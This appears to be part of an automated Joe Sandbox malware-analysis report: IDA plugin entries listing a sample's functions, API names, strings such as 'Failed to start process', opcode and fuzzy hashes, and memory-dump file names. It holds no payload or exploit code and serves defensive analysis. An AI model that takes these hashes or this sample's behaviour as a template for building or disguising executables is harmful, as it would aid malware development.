                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle_invalid_parameter_noinfo_noreturn$CreateErrorLastProcess
                                                                                                                                                                  • String ID: *L\(&.$Failed to start process. Error: $Process started successfully.
                                                                                                                                                                  • API String ID: 1451358647-4289709590
                                                                                                                                                                  • Opcode ID: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                  • Instruction ID: b2b2ed1c5fad083d295e3f3fb989fda28cf27c2013e850e9cc6bf12ce5d74984
                                                                                                                                                                  • Opcode Fuzzy Hash: e3d3d740665aa7ee2c2765959bdd43bb499740c28333729e43370f3c62015b0a
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E51AA72E18B4582EA10EB65E84036DA761EBE57B4F904335EAEC12AD9DF7CD1C0CB10
                                                                                                                                                                  Function 00007FF72CA0BA50 Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                  • Opcode ID: d555225036e99206b5252b2ebf367420b7452d8b36f1f8833aa849c4bd55e744
                                                                                                                                                                  • Instruction ID: 3cca60e42d4a93eb02bd6d1140d9ddc6a4e2b6dfab176c5f3de97afd69b25fc0
                                                                                                                                                                  • Opcode Fuzzy Hash: d555225036e99206b5252b2ebf367420b7452d8b36f1f8833aa849c4bd55e744
                                                                                                                                                                  • Instruction Fuzzy Hash: 09C1E62290D68742F760AB25BD40BBDEB71EBA0BE0F950131DA4D07391EE7CE854CB60
                                                                                                                                                                  Function 00007FF72C9C5450 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy__std_fs_code_page
                                                                                                                                                                  • String ID: *L\(&.$directory_iterator::directory_iterator$status
                                                                                                                                                                  • API String ID: 250480979-252251142
                                                                                                                                                                  • Opcode ID: 6b271a603e1a1da7f7bcda79ef5f09e12fa8ad839d1168a2ce8e3c19f117126c
                                                                                                                                                                  • Instruction ID: 9e2e7302ece7bc98575499bc76e97f98d32a175d486301f2607b816c545df039
                                                                                                                                                                  • Opcode Fuzzy Hash: 6b271a603e1a1da7f7bcda79ef5f09e12fa8ad839d1168a2ce8e3c19f117126c
                                                                                                                                                                  • Instruction Fuzzy Hash: 57A1A372F04B8186EB00EF75C8402ACB361FB69BA8F548631DA8D57B95DF38D691CB50
                                                                                                                                                                  Function 00007FF72C9F91B0 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2067211477-0
                                                                                                                                                                  • Opcode ID: bee981d107ffd2c636f223796776cabd8b2131727789446fa9e3887c556757f5
                                                                                                                                                                  • Instruction ID: 7351a5c9e702c1d132a8c029b1bb05d42be1eb3a627bbe9a596377fda7151524
                                                                                                                                                                  • Opcode Fuzzy Hash: bee981d107ffd2c636f223796776cabd8b2131727789446fa9e3887c556757f5
                                                                                                                                                                  • Instruction Fuzzy Hash: C9219D35A09B818AEE14BB62AC005B9F3A4FFA5BF0F840531DE8D43759DE3CE500CA21
                                                                                                                                                                  Function 00007FF72C9FD340 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3215553584-578493202
                                                                                                                                                                  • Opcode ID: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
                                                                                                                                                                  • Instruction ID: 88b39f5dea0eb791e52861ea55c39440314cf25e14d72a3550defde1074f8919
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c5a883d0f041aa252917f98a925284d0206d2befd72037d690fca7ed0463080
                                                                                                                                                                  • Instruction Fuzzy Hash: 1691B063F0562685FF15EF68DD106B8A2A9EF747A8F800135DE8D866D9DF2CF4018B60
                                                                                                                                                                  Function 00007FF72C9B5060 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_directory_iterator_open
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 56456669-578493202
                                                                                                                                                                  • Opcode ID: 0b41d4647d116bd5198f576b02a13b265af16fad780471928a2ce838859b37be
                                                                                                                                                                  • Instruction ID: aab35307b274ff14a5274daa1f713680ea583f562a0496c70f36c7e849228308
                                                                                                                                                                  • Opcode Fuzzy Hash: 0b41d4647d116bd5198f576b02a13b265af16fad780471928a2ce838859b37be
                                                                                                                                                                  • Instruction Fuzzy Hash: B051E661F18B8661FE60FB19D84037DA250EFA5BB0FC04231DAAD076D5DE6CE580CB20
                                                                                                                                                                  Function 00007FF72CA08038 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF72CA08023), ref: 00007FF72CA08154
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,?,00007FF72CA08023), ref: 00007FF72CA081DF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                  • Opcode ID: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
                                                                                                                                                                  • Instruction ID: 0e6210d709fac6cc4d4b804c0678dce71676e20e0a4891cef6ccf1a4d9f9b73c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0af44ed879d04c6a77923aebd220237353c8c50281d91ab94cd28a593b70c73a
                                                                                                                                                                  • Instruction Fuzzy Hash: A191C532A18A5185F750AF75AC80BBDABB0FF64BE8F944139DE0E57685CE38D441CB24
                                                                                                                                                                  Function 00007FF72C9D7870 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 73155330-578493202
                                                                                                                                                                  • Opcode ID: 16a4938508eaed1f91d29979786016e322a0107a4e7c7c2525a9619896fa693f
                                                                                                                                                                  • Instruction ID: 4f9cf6fe7739fd80d7c8100aad42f5de541305e0acae788d46906dda40f020ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 16a4938508eaed1f91d29979786016e322a0107a4e7c7c2525a9619896fa693f
                                                                                                                                                                  • Instruction Fuzzy Hash: 7871D462B0878542EE14EB15A84837AE355EBA5BE0F944536EECD1BB8DDF3DE081C710
                                                                                                                                                                  Function 00007FF72C9D6930 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: ios_base::badbit set
                                                                                                                                                                  • API String ID: 73155330-3882152299
                                                                                                                                                                  • Opcode ID: fcc3d685a97bf8d5195d467648a0f0a8b0c748a6ac851d00ad576988299f5e9b
                                                                                                                                                                  • Instruction ID: 89a126e6a8bf3cd654ffafe886e28a6162573d324e5819106420c2d28a3943ee
                                                                                                                                                                  • Opcode Fuzzy Hash: fcc3d685a97bf8d5195d467648a0f0a8b0c748a6ac851d00ad576988299f5e9b
                                                                                                                                                                  • Instruction Fuzzy Hash: 9251D522B09B8542EE24EF55E90427DA361EB65BE4F908B31DAED137C9DF3CE480C610
                                                                                                                                                                  Function 00007FF72C9F3098 Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3251591375-0
                                                                                                                                                                  • Opcode ID: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
                                                                                                                                                                  • Instruction ID: d478926d33698043dcb488b08144c122443374e0229a223f5e54a4983dc848ea
                                                                                                                                                                  • Opcode Fuzzy Hash: fe0f21b8207a9c1d681b1e86eca7ece4314975d930c51d0972b0bd39b63ad0f0
                                                                                                                                                                  • Instruction Fuzzy Hash: E6316961F0850782FA54BB21AC263B9A299FF713A4FC44034D98E472E7DE2DE504CA75
                                                                                                                                                                  Function 00007FF72C9F90E8 Relevance: 4.5, APIs: 3, Instructions: 27threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72CA070FC: GetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA0710B
                                                                                                                                                                    • Part of subcall function 00007FF72CA070FC: SetLastError.KERNEL32(?,?,?,00007FF72CA0167D,?,?,?,?,00007FF72CA0A1B8,?,?,?,00007FF72C9F47BB), ref: 00007FF72CA071AB
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00007FF72C9F9295,?,?,?,?,00007FF72C9F90D9), ref: 00007FF72C9F9123
                                                                                                                                                                  • FreeLibraryAndExitThread.KERNEL32(?,?,?,00007FF72C9F9295,?,?,?,?,00007FF72C9F90D9), ref: 00007FF72C9F9139
                                                                                                                                                                  • ExitThread.KERNEL32 ref: 00007FF72C9F9142
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1991824761-0
                                                                                                                                                                  • Opcode ID: c99bafb6b63b6d6b4a0477b090e1c336143c64e24cabe7b9098992bbbfecb400
                                                                                                                                                                  • Instruction ID: 792f161004f2c6bd8164d950a60ea293b2d5f4e844a0aa153fab1886a751cd08
                                                                                                                                                                  • Opcode Fuzzy Hash: c99bafb6b63b6d6b4a0477b090e1c336143c64e24cabe7b9098992bbbfecb400
                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF08C21B0868286FB147B34984967CA368EF65B78FA80331D67C022E4CF3CD841CB61
                                                                                                                                                                  Function 00007FF72C9F8704 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                  • Opcode ID: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                  • Instruction ID: c2d16b692f3ba1b98222908ce8ef9ca186d61c3e622a78576f04e5efdc82aec2
                                                                                                                                                                  • Opcode Fuzzy Hash: 90b2bb542c3388067afa17ba55e6a045ef48b0742b450bfd02d82605817d26bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 25D05E20F0820243FB843B302C86638D225DF69B61F90143CC84F16397CD3CA80D4B69
                                                                                                                                                                  Function 00007FF72C9CDF30 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 221COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  • Opcode ID: dea46c4ca356dce60ce02a55334956757d660a50a99ae36b9b6fb0b255bfd765
                                                                                                                                                                  • Instruction ID: 7963078e19cfd4e709e34f857e38009730889abef42c25e67f2d5085cd420418
                                                                                                                                                                  • Opcode Fuzzy Hash: dea46c4ca356dce60ce02a55334956757d660a50a99ae36b9b6fb0b255bfd765
                                                                                                                                                                  • Instruction Fuzzy Hash: 32A1AF33B14A8189EB10DB65C8502AC77B4FB58B68F841632DF9E53B94CF38D690CB10
                                                                                                                                                                  Function 00007FF72C9B5680 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 0-578493202
                                                                                                                                                                  • Opcode ID: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
                                                                                                                                                                  • Instruction ID: 10ad6416c00481cbfa9a80ff8f7bc89666beee817d643f9572b96e1b8207c450
                                                                                                                                                                  • Opcode Fuzzy Hash: c1ca8e71dca233b18151e78d569e65759aca1a0d3b30d694b6e1093483697a2d
                                                                                                                                                                  • Instruction Fuzzy Hash: 60610962B1864192EA60EB19D84427DF391FB60FB0FC44131EEDD476D5DE7CE4818A10
                                                                                                                                                                  Function 00007FF72C9E27F0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  • Opcode ID: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
                                                                                                                                                                  • Instruction ID: 0d402ed8e94a992c5b5da1665abb88c631f74f106a3bea95e2cf0d30f2249b86
                                                                                                                                                                  • Opcode Fuzzy Hash: c5d642ed799c4159ed69cb954db0d6d14ae4b60587307b7214a5c5fbb0a0edd3
                                                                                                                                                                  • Instruction Fuzzy Hash: A2618572B18B8586EB00DB65E8402ADA760FBA4BA4F909126DF8D57B69DF7CD041CB10
                                                                                                                                                                  Function 00007FF72C9E2AE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.2302909249.00007FF72C9B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72C9B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.2302879061.00007FF72C9B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302956005.00007FF72CA20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302977134.00007FF72CA3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.2302992227.00007FF72CA41000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72c9b0000_file.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                  • String ID: *L\(&.
                                                                                                                                                                  • API String ID: 3668304517-578493202
                                                                                                                                                                  • Opcode ID: f38399ee74dc5a471c005bcc0bfe9834c3e84ee0010f87021a56b98ebc8e01ca
                                                                                                                                                                  • Instruction ID: eae6262f6f2b65783eb474595d2d12d74596b40ed61e5bd8ab64caad86be745b
                                                                                                                                                                  • Opcode Fuzzy Hash: f38399ee74dc5a471c005bcc0bfe9834c3e84ee0010f87021a56b98ebc8e01ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31B622A1CBC142E610EB15E85036AE361FBE57E0F545232FBCD02AAADF3DD4818F10
                                                                                                                                                                  Function 00007FF72C9D8870 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00007FF72C9CF4E0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF72C9CF5E2
